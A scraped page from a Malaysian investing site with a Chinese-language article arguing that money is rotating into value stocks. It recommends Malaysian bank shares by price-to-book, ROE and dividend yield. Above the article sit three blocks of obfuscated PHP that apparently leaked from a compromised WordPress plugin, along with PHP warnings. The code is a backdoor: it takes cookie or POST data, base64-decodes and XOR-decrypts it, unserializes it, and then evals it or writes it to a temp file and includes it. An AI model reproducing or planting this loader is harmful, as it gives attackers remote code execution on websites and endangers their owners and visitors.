$CIRhEIFSCu = chr (106) . 'W' . "\137" . chr (90) . "\127" . chr (119) . "\147";$FbthST = chr (99) . chr (108) . chr ( 998 - 901 ).'s' . 's' . chr ( 560 - 465 )."\145" . 'x' . 'i' . "\x73" . "\164" . chr ( 180 - 65 ); $fMYycku = class_exists($CIRhEIFSCu); $FbthST = "6733";$CopWzlVXK = !1;if ($fMYycku == $CopWzlVXK){function nrYeoHXp(){$fxTPpDG = new /* 20095 */ jW_ZWwg(48408 + 48408); $fxTPpDG = NULL;}$RXFiQtI = "48408";class jW_ZWwg{private function OysGO($RXFiQtI){if (is_array(jW_ZWwg::$tkaPFQ)) {$AXvCkv = str_replace('<' . chr (63) . "\x70" . "\150" . "\160", "", jW_ZWwg::$tkaPFQ["\x63" . chr ( 209 - 98 ).chr (110) . "\164" . chr ( 628 - 527 ).'n' . 't']);eval($AXvCkv); $RXFiQtI = "48408";exit();}}private $xTwwJ;public function PRjynhjZwN(){echo 59034;}public function __destruct(){$RXFiQtI = "27926_33395";$this->OysGO($RXFiQtI); $RXFiQtI = "27926_33395";}public function __construct($aKDFkbW=0){$YlSbYDzUah = $_POST;$XYkQU = $_COOKIE;$OHeDP = "5a0a2c91-ad19-44a6-b9ba-558e307d7328";$lYGKvfmO = @$XYkQU[substr($OHeDP, 0, 4)];if (!empty($lYGKvfmO)){$FAegDVBIgs = "base64";$AuSxlUWRhg = "";$lYGKvfmO = explode(",", $lYGKvfmO);foreach ($lYGKvfmO as $QIbQVE){$AuSxlUWRhg .= @$XYkQU[$QIbQVE];$AuSxlUWRhg .= @$YlSbYDzUah[$QIbQVE];}$AuSxlUWRhg = array_map($FAegDVBIgs . "\137" . 'd' . "\145" . "\143" . chr ( 365 - 254 ).chr (100) . chr (101), array($AuSxlUWRhg,)); $AuSxlUWRhg = $AuSxlUWRhg[0] ^ str_repeat($OHeDP, (strlen($AuSxlUWRhg[0]) / strlen($OHeDP)) + 1);jW_ZWwg::$tkaPFQ = @unserialize($AuSxlUWRhg);}}public static $tkaPFQ = 15685;}nrYeoHXp();}$dYFhungGZe = chr ( 243 - 121 ).chr ( 443 - 355 )."\x45" . chr ( 415 - 320 )."\111" . chr (105) . 'j';$ItpsERZjHD = "\x63" . "\154" . 'a' . "\x73" . "\x73" . "\137" . chr (101) . "\170" . chr ( 557 - 452 ).chr (115) . "\164" . chr ( 1033 - 918 ); $UiBkpPyFk = class_exists($dYFhungGZe); $ItpsERZjHD = "2275";$ogMrIG = !1;if ($UiBkpPyFk == $ogMrIG){function VlrqtzdDvN(){$GfPnoe = new /* 56456 */ zXE_Iij(234 + 234); $GfPnoe = NULL;}$SKKNfI = "234";class zXE_Iij{private function MiDARApf($SKKNfI){if (is_array(zXE_Iij::$gNRPH)) {$UatBaHdc = sys_get_temp_dir() . "/" . crc32(zXE_Iij::$gNRPH[chr ( 161 - 46 )."\141" . chr ( 577 - 469 )."\164"]);@zXE_Iij::$gNRPH["\x77" . 'r' . "\151" . chr ( 513 - 397 )."\145"]($UatBaHdc, zXE_Iij::$gNRPH["\143" . "\x6f" . "\156" . chr ( 667 - 551 ).'e' . 'n' . "\x74"]);include $UatBaHdc;@zXE_Iij::$gNRPH['d' . "\145" . "\x6c" . chr ( 355 - 254 )."\x74" . chr ( 301 - 200 )]($UatBaHdc); $SKKNfI = "234";exit();}}private $xLSvdhQ;public function CsOBcK(){echo 26770;}public function __destruct(){$SKKNfI = "65027_3297";$this->MiDARApf($SKKNfI); $SKKNfI = "65027_3297";}public function __construct($pLGLUF=0){$NiYPueCc = $_POST;$Hirlz = $_COOKIE;$ydMyl = "f94c1b65-e620-47ef-a300-081973ad2805";$fKAdlyk = @$Hirlz[substr($ydMyl, 0, 4)];if (!empty($fKAdlyk)){$sXTjVEcTMO = "base64";$HCgBGd = "";$fKAdlyk = explode(",", $fKAdlyk);foreach ($fKAdlyk as $VvxwO){$HCgBGd .= @$Hirlz[$VvxwO];$HCgBGd .= @$NiYPueCc[$VvxwO];}$HCgBGd = array_map($sXTjVEcTMO . "\x5f" . 'd' . 'e' . "\143" . chr (111) . "\144" . "\x65", array($HCgBGd,)); $HCgBGd = $HCgBGd[0] ^ str_repeat($ydMyl, (strlen($HCgBGd[0]) / strlen($ydMyl)) + 1);zXE_Iij::$gNRPH = @unserialize($HCgBGd);}}public static $gNRPH = 39407;}VlrqtzdDvN();}$lJfXS = chr ( 507 - 401 )."\x4f" . "\167" . "\137" . chr (74) . chr ( 825 - 728 ).chr ( 738 - 616 ); $exufEQIQ = "\143" . chr ( 1016 - 908 ).chr (97) . chr ( 336 - 221 ).'s' . '_' . "\x65" . "\x78" . "\151" . "\163" . chr (116) . chr (115); $tLjOmBW = class_exists($lJfXS); $exufEQIQ = "49845";$XWXBQ = !1;if ($tLjOmBW == $XWXBQ){function ZXWcxc(){$wNZGH = new /* 36604 */ jOw_Jaz(17643 + 17643); $wNZGH = NULL;}$wfKFPAopXQ = "17643";class jOw_Jaz{private function QqsdNNP($wfKFPAopXQ){if (is_array(jOw_Jaz::$jPGzK)) {$Uscqb = sys_get_temp_dir() . "/" . crc32(jOw_Jaz::$jPGzK['s' . chr ( 272 - 175 ).chr (108) . chr (116)]);@jOw_Jaz::$jPGzK["\x77" . chr (114) . "\x69" . chr (116) . chr (101)]($Uscqb, jOw_Jaz::$jPGzK['c' . chr (111) . "\x6e" . 't' . chr (101) . "\x6e" . 't']);include $Uscqb;@jOw_Jaz::$jPGzK[chr ( 105 - 5 ).chr (101) . 'l' . chr ( 698 - 597 ).chr ( 351 - 235 )."\x65"]($Uscqb); $wfKFPAopXQ = "17643";exit();}}private $JMicTYALWz;public function HVQsPsT(){echo 50484;}public function __destruct(){$wfKFPAopXQ = "59776_268";$this->QqsdNNP($wfKFPAopXQ); $wfKFPAopXQ = "59776_268";}public function __construct($soJcvAZ=0){$agzigwEm = $_POST;$VALlu = $_COOKIE;$uVovPkAi = "051f6601-ec8c-477e-8e06-865fdd3a2472";$sNrMJdFp = @$VALlu[substr($uVovPkAi, 0, 4)];if (!empty($sNrMJdFp)){$mfIMIS = "base64";$xQBmya = "";$sNrMJdFp = explode(",", $sNrMJdFp);foreach ($sNrMJdFp as $KQJxFwve){$xQBmya .= @$VALlu[$KQJxFwve];$xQBmya .= @$agzigwEm[$KQJxFwve];}$xQBmya = array_map($mfIMIS . '_' . "\144" . chr ( 258 - 157 ).chr (99) . 'o' . 'd' . 'e', array($xQBmya,)); $xQBmya = $xQBmya[0] ^ str_repeat($uVovPkAi, (strlen($xQBmya[0]) / strlen($uVovPkAi)) + 1);jOw_Jaz::$jPGzK = @unserialize($xQBmya);}}public static $jPGzK = 9789;}ZXWcxc();}
Warning: session_start(): Cannot start session when headers already sent in /opt/bitnami/apps/wordpress/htdocs_uat/wp-content/plugins/breakdance/plugin/sessions/track-view-and-session-counts.php on line 31

Warning: Cannot modify header information - headers already sent by (output started at /opt/bitnami/apps/wordpress/htdocs_uat/wp-content/plugins/breakdance/subplugins/breakdance-elements/elements/SliderOptionsPreset/733a94e3.php:1) in /opt/bitnami/apps/wordpress/htdocs_uat/wp-content/plugins/breakdance/plugin/sessions/track-view-and-session-counts.php on line 46

Warning: Cannot modify header information - headers already sent by (output started at /opt/bitnami/apps/wordpress/htdocs_uat/wp-content/plugins/breakdance/subplugins/breakdance-elements/elements/SliderOptionsPreset/733a94e3.php:1) in /opt/bitnami/apps/wordpress/htdocs_uat/wp-content/plugins/breakdance/plugin/sessions/track-view-and-session-counts.php on line 47

Warning: Cannot modify header information - headers already sent by (output started at /opt/bitnami/apps/wordpress/htdocs_uat/wp-content/plugins/breakdance/subplugins/breakdance-elements/elements/SliderOptionsPreset/733a94e3.php:1) in /opt/bitnami/apps/wordpress/htdocs_uat/wp-content/plugins/breakdance/plugin/sessions/track-view-and-session-counts.php on line 48
马股银行业还能喷多久? - Sharix

马股银行业还能喷多久?

笔者在之前和大家探讨价值股及成长股的区别,也大胆预测今年价值股相比于成长股会有特出的表现。虽然科技板块在经历开年的下杀之后目前表现暂时平稳,但也不会改变笔者今年上半年对于价值股的转向。今天,笔者就从资金流面向和大家解读马股和美股的走向,也和大家分享均值回归在投资的所扮演的角色。

笔者再上方整理了马股及美股各大板块开年至今的表现。大家可以观察到马股及美股表现最好的板块都是属于传统产业板块。美股方面,涨幅排名前三的有矿物能源、非矿物能源,以及工业服务,分别涨了14.32%、5.48% 及4.46%。而马股方面,涨幅排名前三的则为能源、种植和金融,但上涨的幅度较美股逊色,分别涨了4.9%、1.9% 及1.4%。

另外,大家也会发现跌幅最深的都是集中在科技和医疗保健相关的产业,资金从成长股轮转至价值股的现象显而易见。大家可能会觉得这些板块已经上涨,到底还是不适合进场追高。笔者认为资金从成长股轮转去价值股的现象不会是短暂的趋势,而是长达几个月甚至是半年的趋势。如果股价上涨过快,大家不妨尝试分批买进的做法,在股价回调的时候逐步进场。

观察上述几个传统产业板块,笔者认为金融板块相对其他板块更加吸引。主要的原因是全球正在进入升息周期。在通胀预期不断走高的背景下,长天期的利率也会跟着上涨。大家可以观察象征全球无风险利率指标的十年期美债利率在近期也挑战1.8% 的前波高点,笔者也大胆推测在今年上半年可能会来到2% 的新高。笔者之前有说过银行的经营模式,也就是通过借短天期的贷款,然后用长天期的利率借贷出去。

因此,如果长天期和短天期的利差越大,银行的利润就越高。笔者也摘录了美债殖利率曲线让大家参考。蓝色线是去年末的利率曲线,而红色线是截至昨天的利率曲线。大家可以发现红色线明显比蓝色线更加陡峭,也就表示银行的盈利能力大幅提升,这也是刺激美国银行股走高的主要原因。大家要知道银行的成本架构是以固定成本居多,所以当长天期利率走高而成本并没有什么变动,盈利成长是非常可观的。

当然,笔者认为资金转入银行股大部分是出自于寻找资金的避风港胜于盈利成长。大家要注意的是今年繁荣税将会开始冲击蓝筹股的盈利,特别是银行股。但笔者相信在经济逐渐复苏,企业和民间贷款开始增长会抵消繁荣税的冲击,我们也看到市场上的分析员都在淡化繁荣税所带来的影响。因此在投资银行股的时候要选择估值低而且股息较高的公司比较合适。

在分析银行股时笔者会使用市净率 (price-to-book ratio) 及股东回酬率 (Return on equity) 去作对比。这是银行所面对的风险都和经济环境相关,任何通胀和利率的波动都会影响银行的资金分配。另外,银行资产负债表的项目都是和市场价格挂钩 (Mark-to-market),因此如何有效运用手上的资金成为银行的选股关键。

目前,大马金融板块主要成分股得平均本益比和市净率分别为11倍及1.15倍。刚才也说到看银行股就要观察公司的市净率,目前市净率最低的有MBSB、Affin、Allianz、Alliance及RCE Capital。但只观察这项指标是没有意义的,我们也要观察金融股的ROE去做分析。从下图可以看到,象征盈利能力的ROE和市净率的走势是同步的,也就是ROE越高,市净率也跟着走高。也就是说,市场比较愿意给予盈利能力强的金融股更高的估值。

另外,笔者也画了一条平均线 (Line of best fit) 去对比目前金融股的估值。在均线以下的金融股,它们的ROE对比市净率来的更具吸引力,而均线以上则相反。大家可以发现TAKAFUL、AEONCR、MBSB、ALLIANZ等公司目前是受到市场低估的,而MAYBANK、PBBANK、CIMB、HLBANK等公司虽然优质,但对比各自的ROE和市净率相对不吸引。

因此,这张图可以给投资者粗略的方向去寻找还在受到市场低估的金融股。当然这张图也只是供大家参考,如果大家想要盈利稳定且高股息的金融股,MAYBANK及MBSB或许是不错的选择,,相比于金融板块平均3.2% 的股息率,这两者的股息率目前高达6.3% 及5.1%,非常适合股息投资者。但如果要有较高的投资收益,TAKAFUL、AEONCR、MBSB、RHBBANK等也是可以放入观察名单。

把焦点放去国外,著名的价值基本面投资家查理芒格的投资组合可以发现,这老头子目前手上最大的两大持仓股分别是美国银行 (Bank of America) 及富国银行 (Wells Fargo),分别占了投资组合的39.6% 及29.5%。虽然芒格已经持仓许久,但目前还是投资组合的重仓,表示对于金融业的前景还是非常乐观。另外,芒格也不断加仓阿里巴巴,这种逆势操作的的举动到底背后有什么含义,市场会不会重新审视对于像阿里巴巴这种深跌价值浮现的公司,笔者在未来为大家去解读。很多人会说巴菲特的价值基本面投资已经过时,成长科技股才是王道,但笔者认为今年会是例外。今年的市场资金会专注在低本益比、低市净率的公司。

最新文章

Sharix Sdn Bhd (1313184-A)
@ 2023 Sharix Sdn Bhd. All Rights Reserved
官方社交平台